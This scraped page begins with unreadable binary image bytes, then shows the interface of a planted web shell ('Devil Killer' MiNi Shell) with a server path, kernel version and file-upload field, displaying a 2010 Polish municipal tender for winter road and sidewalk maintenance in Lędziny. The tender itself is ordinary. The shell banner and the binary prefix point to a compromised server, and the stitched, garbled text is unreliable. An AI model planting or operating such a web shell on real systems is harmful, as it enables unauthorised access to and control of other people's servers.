JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101015/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101015/289945-N-2010.html

<p class="kh_header"><b>Lędziny: ZIMOWE UTRZYMANIE DRÓG I CHODNIKÓW   GMINNYCH NA TERENIE MIASTA  LĘDZINY</b><br>
<b>Numer ogłoszenia: 289945 - 2010; data zamieszczenia: 15.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Lędziny , ul. Lędzińska 55, 43-143 Lędziny, woj. śląskie.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZIMOWE UTRZYMANIE DRÓG I CHODNIKÓW   GMINNYCH NA TERENIE MIASTA  LĘDZINY.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zimowe utrzymanie dróg i chodników GMINNYCH 
na terenie miasta  LĘDZINY w ROKU  2011.
 
1. WSTĘP.

Przedmiotem niniejszej specyfikacji są wymagania dotyczące wykonania i sposobu prowadzenia Akcji Zima na drogach gminnych  na terenie miasta Lędziny.
Przystępując do przetargu, a w późniejszym czasie do realizacji zadania należy spełniać wszystkie wymogi i zalecenia niniejszej specyfikacji. 
Każdorazowe odstępstwo lub niespełnienie któregoś z warunków powoduje naliczenie (zgodnie z umową) odpowiednich kar pieniężnych.

2. Materiały.

Zleceniodawca musi zaakceptować wszystkie materiały i technologie, jakimi będą wykonywane prace.
W razie występowania podejrzeń, co do jakości stosowanych materiałów i sprzętu, Wykonawca wykona na własny koszt niezbędne badania i przedstawi ich wyniki zleceniobiorcy w celu akceptacji.

2.1. Materiały uszorstniające (do uszorstniania lodu, zlodowaciałego i ubitego śniegu).

Materiały uszorstniające stosowane do posypywania nawierzchni w zimowym utrzymaniu dróg powinny spełniać następujące podstawowe wymagania:
1.zapewniać zakładany współczynnik tarcia na nawierzchni,
2.nie być toksyczne i szkodliwe dla środowiska,
3.nie powodować zniszczeń nawierzchni i pojazdów,
4.dać się łatwo rozsypywać na nawierzchni,i powinny charakteryzować się następującymi parametrami:
1uziarnienie powinno być w miarę jednolite, wielkość ziaren powinna zawierać się pomiędzy 1-4mm,
2zawartość ziaren drobnych (<0,075mm) powinna być minimalna (max do 3%),
3ziarna nie mogą być spłaszczone i muszą mieć kształt regularny,
4materiały uszorstniające powinny wykazywać dostateczną wytrzymałość na mechaniczne niszczenie przez ruch, nie mogą ulegać rozdrabnianiu,
5powinny być dostarczane i składowane w stanie suchym,
Do uszorstniania mogą być stosowane następujące materiały: piasek, żwir, grys, jednak tylko wtedy gdy spełniają wymagania odpowiednich norm.
2.2. Środki chemiczne.
Do usuwania i łagodzenia skutków śliskości zimowej należy stosować następujące środki chemiczne:
1.sól (NaCl) wg PN-86/C-84081/02,
2.Chlorek Wapnia techniczny PN-75/C-84127
3.Solanka BN-86/6011-07

Dobór materiałów i ich wydatki jednostkowe do usuwania śliskości należy dobrać w zależności od panujących warunków pogodowych oraz typu występującej lub spodziewanej śliskości.

2.3. Przygotowanie i składowanie materiałów do usuwania śliskości zimowej.

Materiały stosowane do usuwania śliskości zimowej powinny być składowane w specjalnie do tego przygotowanych magazynach stałych lub tymczasowych.
Środki chemicznie, głównie chlorek sodu (NaCl) w stanie luźnym musi by składowany w magazynach zamkniętych, pozostałe środki chemiczne stosowane do likwidowania śliskości należy składować zgodnie z instrukcją magazynową.
Materiały uszorstniające z dodatkiem środków chemicznych lub same materiały uszorstniające powinny być składowane w przykrywanych pryzmach.

2.4. Odpowiedzialność za stosowanie materiałów niezgodnych z normami.

Całkowita odpowiedzialność ciąży na Wykonawcy robót. W przypadku stwierdzenia przez urząd miasta, że Wykonawca stosuje materiały niezgodne ze specyfikacja lub uzgodnieniami, obciąży się wykonawcę karami zgodnie z umowa, aż do zerwania umowy włącznie.

3. Sprzęt.
Po przeprowadzonym przetargu Zleceniodawca może przeprowadzić kontrolę wymaganego w specyfikacji sprzętu, którego brak lub niewłaściwe parametry spowodują odrzucenie oferty.

3.1. Przygotowanie sprzętu.

Sprzęt powinien być przygotowany w takim stopniu, aby mógł być gotowy do użycia w ciągu 2 godzin od chwili powołania Akcji Zima.
Na każde żądanie Zleceniodawcy, należy przedstawić posiadany sprzęt, a w razie występowania podejrzeń, co do jakości i sprawności sprzętu, Wykonawca wykona na własny koszt niezbędne badania i przedstawi ich wyniki zleceniobiorcy w celu akceptacji. Jeżeli okaże się, że sprzęt nie spełnia stawianych mu wymogów należy niezwłocznie dokonać odpowiednich napraw bądź wymiany wadliwego sprzętu.

3.2. Sprzęt do odśnieżania i likwidowania śliskości.

Wykonawca musi posiadać następujący sprzęt:
      A. Drogi wraz z zatokami autobusowymi:
1.min. dwa zestawy sprzętowe do odśnieżania dróg - każdy zestaw sprzętowy musi posiadać pług, a jeden z nich dodatkowo  rozsypywarkę do likwidowania śliskości,
2.min. jeden zestaw do udrażniania dróg  i odwozu zalęgającego śniegu -  zestaw musi posiadać spycharkę oraz samochód samowyładowczy.

B.Chodniki :
1.min. 1 pojazd mechaniczny wyposażony w pług do odśnieżania chodników, o maksymalnej masie 600kg plus brygada składająca się min. z 3 pracowników do bieżącego odśnieżania terenu w pobliżu centrum. 
Zamontowane pługi mają umożliwiać odśnieżanie także zawężonych chodników o szerokości      
1.Pługi nie mogą uszkadzać nawierzchni chodnika, krawężników itd.
2.Podstawowe parametry technologiczne, jakie rozsypywarka ma zapewnić, to zakładany: wydatek jednostkowy rozsypywanego materiału, szerokość rozsypywania oraz równomierność rozsypywania.

Do rozsypywania środków chemicznych należy używać rozsypywarek dających gwarancje ich rozsypywania z wydatkiem jednostkowym 5 do 30 g/m2, a materiałów uszorstniających  lub ich mieszanin ze środkami chemicznymi z wydatkiem jednostkowym od 50 do 150 g/m2. 
Rozrzut środków chemicznych na jezdnię sprzętem mechanicznym nie może przekroczyć 0,9 szerokości jezdni.



3.Środki łączności.
1. Każdy zestaw do odśnieżania jak i koordynator od strony Wykonawcy powinien posiadać telefon komórkowy w celu szybkiej łączności z koordynatorem Akcji Zima. 
Numery powyższych telefonów powinny stanowić załącznik do oferty przetargowej.
4. Zasady prowadzenia Akcji Zima.
Przedmiotem zamówienia jest realizacja zadania pn. (Zimowe utrzymanie dróg i chodników gminnych na terenie miasta Lędziny w roku 2011), obejmującego swym zakresem wskazane drogi, chodniki, zatoki autobusowe.
Akcji Zima prowadzona będzie od 01.01.2011r. Do 14.04.2011od 01.11.2011 r, z tym ze okresy te mogą ulec zmianie w zależności od warunków atmosferycznych. 
Zimowe utrzymanie prowadzone i rozliczane będzie w dwóch trybach: czynnym , biernym i oczekującym.
4.1. TRYB CZYNNY (opady śniegu) obejmuje swym zakresem mechaniczne usuwanie śniegu z jezdni, parkingów i placów oraz mechaniczne i ręczne usuwanie śniegu z chodników i schodów.
W przypadku opadów ciągłych wykonawca wykonuje w ciągu doby min. 4-krotne odśnieżanie wszystkich dróg i chodników oraz min. 2-krotne posypywanie wskazanych dróg i chodników oraz pozostałych dróg i chodników w przypadku wystąpienia oblodzenia uniemożliwiającego bezpieczne poruszanie się po drogach.
O zaliczenie doby do trybu czynnego decyduje opad śniegu, którego warstwa po ustaniu opadów będzie wynosi min. 5 cm. 
Wykonawca jest odpowiedzialny do utrzymania dróg i chodników w należytym stanie, tak aby były zachowane warunki bezpiecznego poruszania się po nich ludzi i pojazdów. 
Ustala się maksymalny czas reakcji (przystąpienia do pracy) 30 minut od wezwania Zamawiającego.
Dobę prowadzenia akcji czynnej lub biernej liczymy od godz. 000 do 2359, a decyzja o zaliczeniu poprzedniej doby do trybu biernego, czy też czynnego nastąpi po złożeniu raportu z ubiegłej doby.
Spośród pracowników UM będzie powołany koordynator zimowego utrzymania. Do jego zadań nie będzie jednak należało ( wzywanie do rozpoczęcia trybu czynnego lub biernego) gdyż zakładamy, że zaliczenie doby do trybu czynnego lub biernego  następować będzie ok. godz. 1000 następnego dnia po przeanalizowaniu raportu składanego przez Wykonawcę oraz warunków panujących na drogach w czasie przedmiotowej doby. Wyjątkiem są tu weekendowe doby, które analizowane będą dopiero w poniedziałek w czasie pracy urzędu.
4.1.1 Utrzymanie dróg
		STANDARD  UTRZYMANIA DRÓG W OKRESIE ZIMOWYM


Lp

Standard

Opis standardu
Dopuszczalne odstępstwa od stanu nawierzchni opisanego standardem z określeniem czasu w jakim skutki danego zjawiska atmosferycznego powinny by usunięte (zlikwidowane)


Po ustąpieniu opadów
śniegu
Od stwierdzenia zjawiska atmosferycznego przez kierującego zimowym utrzymaniem lub powzięcia przez niego uwiarygodnionych informacji o wystąpieniu powyższego
1
  III
Jezdnia odśnieżona na całej szerokości, a śliskość zimowa zlikwidowana na: 
- skrzyżowaniach z drogami twardymi;
- skrzyżowaniach z liniami kolejowymi;
- odcinkach o pochyleniu > 4%;
- przystankach autobusowych;
- innych miejscach ustalonych poprzez  zarząd         drogi;


- śnieg luźny może   zalegać do 6 godz.
- może występować warstwa zajeżdżonego śniegu o grubości utrudniającej ruch samochodów osobowych;
- zaspy mogą występować do 6 godz.
W miejscach wymienionych  w kol. 3:
- gołoledzi       - 5  godz.
- szronu          - 5  godz.
- szadzi           - 5  godz.
- lodowicy       - 5  godz.
- śliskości pośniegowej 6 godz.
Odśnieżanie dróg ma na celu usunięcie śniegu z jezdni i poboczy dróg. Do odśnieżania używa się opłużonych pojazdów samochodowych, równiarek, spycharek oraz innych maszyn i nośników przystosowanych do tych prac.
Zakres prac prowadzonych przy odśnieżaniu dróg oraz technologia robót wynikają z aktualnie obowiązujących standardów utrzymania dróg.
Gdy występują opady śniegu lub zjawiska powodujące śliskość (gołoledź, lodowica, śliskość pośniegowa itp.), wykonawca zapewnia min. 2 zestawy sprzętowe do odśnieżania, a w czasie intensywnych opadów śniegu wymagane są dodatkowo dwa ciężkie zestawy do udrażniania dróg (spycharko - ładowarki z samochodami samowyładowczymi).

Drogi odśnieżane w pierwszej kolejności.

Droga powinna być odśnieżona na całej szerokości, natomiast na skrzyżowaniach, ostrych zakrętach i pozostałych miejscach niebezpiecznych, dodatkowo należy usunąć zjawiska powodujące śliskość.

Droga powinna być odśnieżona na całej szerokości, natomiast na skrzyżowaniach, ostrych zakrętach i pozostałych miejscach niebezpiecznych, dodatkowo należy usunąć zjawiska powodujące śliskość.
Do kalkulacji i późniejszego utrzymania proszę przyjąć dla każdego z zakrętów odcinek min. 150 mb. które to utrzymujemy w sposób zapewniający bezpieczne poruszanie się pieszych i zmotoryzowanych.

W pierwszej kolejności powinny być odśnieżone ulice: Sobieskiego, Palmowa, Asnyka, Łanowa, Paderewskiego, Folwarczna,  Fredry, Grunwaldzka, Lewandowskiej, Czapli, 3-go Maja, Matejki, Zakole.
Na powyższych ulicach dopuszcza się możliwość wystąpienia gołoledzi do 5 godzin, śniegu i błota pośniegowego do 6 godzin po ustaniu występowania powyższych zjawisk.

Do kalkulacji proszę przyjąć odcinki po  50 mb na każdym z wlotów na skrzyżowanie.

Do kalkulacji i późniejszego utrzymania proszę przyjąć dla każdego z zakrętów odcinek min. 150 mb.
które to utrzymujemy w sposób zapewniający bezpieczne poruszanie się pieszych i zmotoryzowanych.

4.1.2.  Utrzymanie chodników, przystanków autobusowych, parkingów i placów.
Do bieżącego odśnieżania terenu w pobliżu centrum przystępuje brygada składająca się min. z czterech pracowników.
Przystanki autobusowe, zatoki i chodniki powinny być odśnieżone do 3 godzin.
Dodatkowo należy oczyścić z zalegającego śniegu (między chodnikiem, a jezdnią) wszystkie przejścia dla pieszych. 
Niezależnie od tego, wszystkie przystanki autobusowe, schody i chodniki w mieście powinny być odśnieżone i doprowadzone do należytego stanu już o godzinie 600.

Jako centrum rozumiemy chodniki przy ulicach: Fredry, Paderewskiego, Sobieskiego. Dodatkowo w tej grupie należy ująć chodnik pod ośrodkami zdrowia, szkołami i przedszkolami.
Chodniki te powinny być odśnieżone i posypane solą.
4.1.3. Odśnieżanie miejsc trudno dostępnych.
Przy barierach, zatokach autobusowych, parkingach do odśnieżania używać ładowarek lub usuwać śnieg ręcznie.
Prace te można wykonywać po zakończeniu innych prac, za wyjątkiem odśnieżania zatok autobusowych, które muszą być odśnieżone w trakcie prowadzenia odśnieżania na drodze.
Śnieg zalegający na zatoce autobusowej powinien być w całości wywieziony lub zepchnięty w miejsce nie utrudniające ruchu pieszym i zmotoryzowanym. 
Części przykrawężnikowe jezdni oraz studzienki kanalizacyjne powinny być oczyszczone ze śniegu i lodu w stopniu umożliwiającym spływ wody powstałej z topniejącego śniegu.
4.1.4. Wywożenie śniegu.
W przypadku zalegania dużych ilości śniegu uniemożliwiających poruszanie się pojazdów i pieszych Wykonawca na każde żądanie Zamawiającego wywiezie zalegający śnieg i błoto pośniegowe na działkę gminną przy ul. Fredry obok bazy firmy (EKOREC) Sp. z o.o. oraz na terenach miejskich przy   ul. Stadionowej .

4.2. TRBY BIERNY (brak opadów śniegu) obejmuje swym zakresem:
-  likwidację śliskości na drogach, chodnikach, zatokach i miejscach postojowych. 
- mechaniczne usuwanie śniegu i błota pośniegowego z jezdni, parkingów, placów oraz chodników i schodów. 
- utrzymanie w gotowości sprzętu i ludzi.
Tryb bierny rozliczany będzie w oparciu o stawkę prowadzenia 20%  kwoty za 1 dobę trybu czynnego.
W trybie biernym obowiązują te same zasady, kolejność, terminy i zakresy robót jak te wymienione w trybie prowadzenia czynnej akcji zima, z tym, że w tym przypadku prace polegają głównie na usuwaniu błota pośniegowego i likwidacji śliskości. 
Dodatkowo podczas trybu biernego zlecane będą prace (czyszczenie kratek z zalegającego śniegu, wywożenie śniegu itp.), które mogą być konieczne w celu zapewnienia bezpiecznego korzystania z dróg i chodników.

4.TRYB OCZEKIWANIA  w przypadku:
- braku opadów śniegu,
braku śliskości na drogach, chodnikach, zatokach i miejscach postojowych, obejmuje swym zakresem utrzymanie w gotowości sprzętu i ludzi.

4.4   OCZYSZCZANIE POZIMOWE 
Oczyszczanie pozimowe rozliczane będzie w oparciu o stawkę prowadzenia 1 doby czynnej Akcji Zima. Jako zapłatę za jednorazowe oczyszczenie wszystkich dróg i chodników gminnych na terenie Gminy Lędziny przyjmować będziemy  400%  kwoty za 1 dobę trybu czynnego.
5. Zasady odbioru robót zimowego utrzymania dróg.
Codziennie do godz. 1000 Wykonawca składa raport z prowadzonej Akcji Zima za ubiegłą dobę.
Ustala się miesięczny okres rozliczenia robót. Do każdego rozliczenia miesięcznego Wykonawca przedłoży  meldunki/raporty z miesięcznego okresu prowadzenia Akcji Zima oraz protokół odbioru robót potwierdzony przez koordynatora.
Powyższe raporty, jak i warunki atmosferyczne panujące w czasie poprzedniej doby będą podstawą do zaliczenia doby do danego trybu oraz do późniejszych rozliczeń.
Karty pracy prowadzi Wykonawca, notując w nich kolejne wyjazdy wynikające ze specyfikacji oraz wyjazdy interwencyjne zlecone przez koordynatora.
Karta zawiera krótki opis miejsca wyjazdu (zakres), godzinę wyjazdu oraz czas pracy sprzętu i ludzi.
Zamawiający zastrzega sobie prawo do wglądu w dzienniki pracy sprzętu i w karty drogowe Wykonawcy





6.Orientacyjne długości dróg i chodników oraz powierzchnie .

Długość jezdni - 55,8995 km
Powierzchnia jezdni - 231,8796 tys. m2
Długość chodników - 7,083 km.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-0, 90.63.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz  wykonanych usług   w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, wykonanych w okresie trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załącznikiem dokumentu potwierdzającego, że roboty zostały wykonane prawidłowo  (np. protokoły odbioru robót, referencje) - Załącznik Nr 5 do SIWZ -wykonanie z należytą starannością  minimum 2  usług z zakresu odśnieżania ulic o wartości min. 200 000,00 zł  każda.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz osób odpowiedzialnych za kierowanie i koordynację robót  - załącznik Nr 4 do SIWZ;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności 	związanej przedmiotem zamówienia - wymagana jest polisa  od odpowiedzialności 	cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż  100.000,00 zł.
W przypadku podmiotów składających ofertę wspólną wymóg ubezpieczenia od odpowiedzialności cywilnej dotyczy firm, których oferta łącznie spełnia wymagania Zamawiającego w kwocie nie mniejszej niż    100.000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

